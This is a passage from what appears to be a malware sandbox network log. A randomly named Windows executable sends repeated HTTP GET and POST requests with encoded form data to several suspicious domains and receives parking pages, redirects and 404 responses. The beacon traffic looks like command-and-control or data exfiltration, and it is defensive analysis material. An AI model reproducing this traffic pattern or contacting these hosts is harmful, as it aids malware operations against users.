                              Aug 30, 2024 09:18:33.818640947 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjE5YjI5NzItZmNjYy00ZGVmLWJjNDEtYTI0NzNlNDVjNzhlIiwicGFnZV90aW1lIjoxNzI1MDAyMz


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.549734199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:35.908360958 CEST466OUTGET /kc69/?KxdLgNi=NmpF3EhDDWuD2jt+k/g095xLRHRyuzqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGNcTC3e2/WFeQ1r1lf08AeSNxqtZfuNHfso7Fe4LFqfY2Mw==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.asian-massage-us.xyz
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:18:36.363014936 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:18:36 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1506
                              x-request-id: 16988ed0-8400-407a-8920-4e1b905d5c95
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sEmsm0zeFvU99+4aX0tckfBrrJj24NCIipHKMI/MCjsxkiIeuLfJ340cO6vJtgtyGp1pOrk0nS2FVdiPIxqvug==
                              set-cookie: parking_session=16988ed0-8400-407a-8920-4e1b905d5c95; expires=Fri, 30 Aug 2024 07:33:36 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 73 45 6d 73 6d 30 7a 65 46 76 55 39 39 2b 34 61 58 30 74 63 6b 66 42 72 72 4a 6a 32 34 4e 43 49 69 70 48 4b 4d 49 2f 4d 43 6a 73 78 6b 69 49 65 75 4c 66 4a 33 34 30 63 4f 36 76 4a 74 67 74 79 47 70 31 70 4f 72 6b 30 6e 53 32 46 56 64 69 50 49 78 71 76 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sEmsm0zeFvU99+4aX0tckfBrrJj24NCIipHKMI/MCjsxkiIeuLfJ340cO6vJtgtyGp1pOrk0nS2FVdiPIxqvug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:18:36.363042116 CEST224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTY5ODhlZDAtODQwMC00MDdhLTg5MjAtNGUxYjkwNWQ1Yzk1IiwicGFnZV9
                              Aug 30, 2024 09:18:36.363053083 CEST735INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 49 31 4d 44 41 79 4d 7a 45 32 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 59 58 4e 70 59 57 34 74 62 57 46 7a 63 32 46 6e 5a 53 31 31 63 79 35 34 65 58 6f 76 61
                              Data Ascii: 0aW1lIjoxNzI1MDAyMzE2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYXNpYW4tbWFzc2FnZS11cy54eXova2M2OS8/S3hkTGdOaT1ObXBGM0VoRERXdUQyanQray9nMDk1eExSSFJ5dXpxdG15Sm41MW12R3dmMFpzU3hTM0ZxWmtNWTRFNEJobmk5WlJuUUtYZEN3Zi9GeExpUUJpS0dOY1RDM2UyL1dGZVExcjFsZjA4QWVTTn


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.5497355.144.130.52805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:49.565850973 CEST727OUTPOST /ifo8/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.aflaksokna.com
                              Origin: http://www.aflaksokna.com
                              Referer: http://www.aflaksokna.com/ifo8/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 74 68 68 78 39 59 6e 76 50 43 53 54 59 6b 6f 44 31 35 7a 45 57 6d 43 79 65 63 50 57 51 74 65 48 63 65 46 7a 74 30 51 64 71 45 73 49 48 74 62 57 38 72 64 70 76 35 4c 67 30 41 47 63 63 38 71 47 47 4d 75 52 68 77 39 69 65 79 4e 53 30 66 47 2f 57 57 4a 55 33 54 47 38 4c 58 53 76 4c 74 50 58 49 39 59 68 44 42 48 7a 69 64 44 36 4f 49 65 45 37 4a 41 48 36 4a 32 4d 54 41 58 75 39 46 61 46 4a 78 36 55 33 52 56 38 70 45 70 35 69 31 66 4b 70 63 2f 51 44 4a 36 79 58 5a 5a 74 43 30 77 74 45 71 6f 31 35 6f 55 6b 61 45 50 77 61 62 32 72 52 52 51 65 4c 74 4c 4d 41 30 3d
                              Data Ascii: KxdLgNi=7WgpfID4oFY5Dthhx9YnvPCSTYkoD15zEWmCyecPWQteHceFzt0QdqEsIHtbW8rdpv5Lg0AGcc8qGGMuRhw9ieyNS0fG/WWJU3TG8LXSvLtPXI9YhDBHzidD6OIeE7JAH6J2MTAXu9FaFJx6U3RV8pEp5i1fKpc/QDJ6yXZZtC0wtEqo15oUkaEPwab2rRRQeLtLMA0=


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.5497365.144.130.52805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:52.115134954 CEST747OUTPOST /ifo8/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.aflaksokna.com
                              Origin: http://www.aflaksokna.com
                              Referer: http://www.aflaksokna.com/ifo8/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6c 39 65 48 35 61 46 79 73 30 51 65 71 45 73 44 6e 74 65 5a 63 72 73 70 76 38 6f 67 78 34 47 63 63 34 71 47 44 6f 75 52 53 49 79 6a 4f 79 50 61 55 66 49 37 57 57 4a 55 33 54 47 38 4c 54 6f 76 4c 31 50 57 34 4e 59 75 47 74 41 36 43 64 41 7a 75 49 65 54 72 4a 45 48 36 4a 49 4d 53 73 78 75 37 5a 61 46 49 42 36 55 6b 4a 57 7a 70 45 6e 39 69 30 51 47 59 31 4b 5a 78 31 48 76 30 6f 6e 30 7a 34 31 6f 79 48 43 76 62 67 38 33 36 6f 33 67 4a 54 42 36 68 77 35 45 6f 39 37 53 58 68 50 4a 63 58 4a 75 41 4d 6d 6c 74 61 41 75 5a 5a 53 42 67 73 36
                              Data Ascii: KxdLgNi=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVl9eH5aFys0QeqEsDnteZcrspv8ogx4Gcc4qGDouRSIyjOyPaUfI7WWJU3TG8LTovL1PW4NYuGtA6CdAzuIeTrJEH6JIMSsxu7ZaFIB6UkJWzpEn9i0QGY1KZx1Hv0on0z41oyHCvbg836o3gJTB6hw5Eo97SXhPJcXJuAMmltaAuZZSBgs6
                              Aug 30, 2024 09:18:52.878087044 CEST1021INHTTP/1.1 302 Found
                              Connection: close
                              content-type: text/html
                              content-length: 771
                              date: Fri, 30 Aug 2024 07:18:52 GMT
                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                              location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.5497375.144.130.52805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:54.668154001 CEST1764OUTPOST /ifo8/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.aflaksokna.com
                              Origin: http://www.aflaksokna.com
                              Referer: http://www.aflaksokna.com/ifo8/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6d 64 65 48 76 6d 46 79 50 73 51 66 71 45 73 64 58 74 66 5a 63 72 31 70 76 45 30 67 78 6b 57 63 65 77 71 46 68 67 75 58 6e 6b 79 70 4f 79 50 57 30 66 4a 2f 57 57 6d 55 7a 33 43 38 49 37 6f 76 4c 31 50 57 37 56 59 71 54 42 41 32 69 64 44 36 4f 49 6f 45 37 4a 6f 48 36 67 77 4d 53 6f 48 75 4e 70 61 43 6f 52 36 53 58 74 57 36 70 45 6c 78 43 31 50 47 59 70 6a 5a 31 55 32 76 31 63 64 30 30 30 31 72 7a 69 6f 79 71 35 71 69 70 67 4f 69 4a 53 73 67 33 77 72 42 4c 38 4e 61 6e 64 62 4d 73 2f 6c 6f 47 38 42 6d 70 48 52 31 4f 67 49 47 33 56 45 6c 65 33 31 41 42 2f 41 4b 41 4d 50 4a 6d 34 55 7a 4d 46 65 79 62 4c 4c 6c 34 62 4b 4c 6a 6f 44 4f 78 39 70 36 4e 2b 4e 70 32 4b 75 37 6a 42 5a 36 42 41 49 36 70 64 35 66 78 42 74 33 78 42 30 77 4f 77 2b 6e 6f 75 42 44 4b 6c 6b 36 4e 58 6c 7a 76 58 4a 68 32 70 73 68 37 4f 58 58 52 78 66 49 37 39 44 45 76 5a 75 53 50 57 4c 46 4d [TRUNCATED]
                              Data Ascii: KxdLgNi=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVmdeHvmFyPsQfqEsdXtfZcr1pvE0gxkWcewqFhguXnkypOyPW0fJ/WWmUz3C8I7ovL1PW7VYqTBA2idD6OIoE7JoH6gwMSoHuNpaCoR6SXtW6pElxC1PGYpjZ1U2v1cd0001rzioyq5qipgOiJSsg3wrBL8NandbMs/loG8BmpHR1OgIG3VEle31AB/AKAMPJm4UzMFeybLLl4bKLjoDOx9p6N+Np2Ku7jBZ6BAI6pd5fxBt3xB0wOw+nouBDKlk6NXlzvXJh2psh7OXXRxfI79DEvZuSPWLFMT6HMcs8jW2NXHpTOyOsnKYs2fFWCttm/qAtm/9Mk7gQ8vRHe8D/wqQRC3EiRtmgSes7G6QFXOeN4bfFYz7Vw7LX1UUHFaEobftcs5nrCXLHqwZeWtDf0tYKefcygbLY8l91DXn/TbKMhT0zF1YEV8ylkMX9uD/0KbiY+ZS7KVPEINQj6nj1fGyMOFcY2e9AsjfsRU7IwoFbsTAVvVkilrx8FMVYZGlCyE2WHAobkTHZF1fshGA58vmt3NxmxFCqnD4Jp4ZH/OkmbbZXUqO7LkOqphqCUnd+zz4qiGqXrP1Ks5pNtMUxE6A/dmiRjiRUZYr7IRkyeAvBe5IZ+NoDOMnhfmIyD+96YbZu9/HNGTdjjYmTtDlMk5AtEwfTU4ZwyrkqIKXRjD/aFgw/f1h2+xUBWnojivbQNBeSbyrCYSGM071Lpez6g9/rPgJC93XpBeujzFb4yvAu/WNpWx6obGcIBYJO5qDrV1RjFui62lBWQeXR9co6vIbRgpT9uoUK3wgMGLXKCXNad1f02ixLziZeNd3LvZqYVjxw/FQk/BGArQrowJSAPlCJL6h57jMYSaRYz+opC1F1HOrOAl0J6mUMt0Za4fDTO//VFySVJhnSYwU19wp8uo5Q8/vB0SzZUuJvefxtyJGzUdw20sN5JideDGN+X64uffr [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.5497385.144.130.52805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:57.206478119 CEST460OUTGET /ifo8/?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ag+qKGzHHtle7TmqA+4Kpt5MpPo1VtzF+jhQD474obZk+SA==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.aflaksokna.com
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:19:06.984229088 CEST1172INHTTP/1.1 302 Found
                              Connection: close
                              content-type: text/html
                              content-length: 771
                              date: Fri, 30 Aug 2024 07:19:06 GMT
                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                              location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ag+qKGzHHtle7TmqA+4Kpt5MpPo1VtzF+jhQD474obZk+SA==&lL2=1ZRtX
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.549739161.97.168.245805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:20.155405045 CEST730OUTPOST /p6o9/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/p6o9/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 66 53 32 54 4d 6c 58 45 4d 6c 56 79 74 43 6a 6d 61 7a 54 59 6a 5a 75 55 52 77 42 66 72 78 30 62 51 4f 71 34 34 79 68 75 56 50 7a 71 31 38 75 6e 75 2f 72 65 38 56 61 56 64 6b 48 52 59 75 50 4f 62 49 48 67 66 47 64 78 57 78 4c 30 62 4a 62 70 68 79 48 4a 33 6c 55 75 47 57 50 34 55 37 77 50 52 63 2b 66 68 6a 6d 4f 73 2f 38 79 39 39 39 31 4f 44 35 69 77 73 56 35 7a 53 79 63 79 37 31 4b 6d 78 4e 63 39 4b 2b 61 45 43 6f 42 67 50 61 6f 46 6b 49 58 53 71 57 46 6a 6d 30 54 64 35 78 64 52 6f 7a 56 62 36 35 37 50 74 79 2f 61 7a 33 79 33 65 55 6f 35 39 6a 76 73 45 3d
                              Data Ascii: KxdLgNi=UkDfb8hhEzv8KfS2TMlXEMlVytCjmazTYjZuURwBfrx0bQOq44yhuVPzq18unu/re8VaVdkHRYuPObIHgfGdxWxL0bJbphyHJ3lUuGWP4U7wPRc+fhjmOs/8y9991OD5iwsV5zSycy71KmxNc9K+aECoBgPaoFkIXSqWFjm0Td5xdRozVb657Pty/az3y3eUo59jvsE=
                              Aug 30, 2024 09:19:20.766699076 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:19:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Aug 30, 2024 09:19:20.766726017 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.549740161.97.168.245805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:22.777108908 CEST750OUTPOST /p6o9/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/p6o9/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
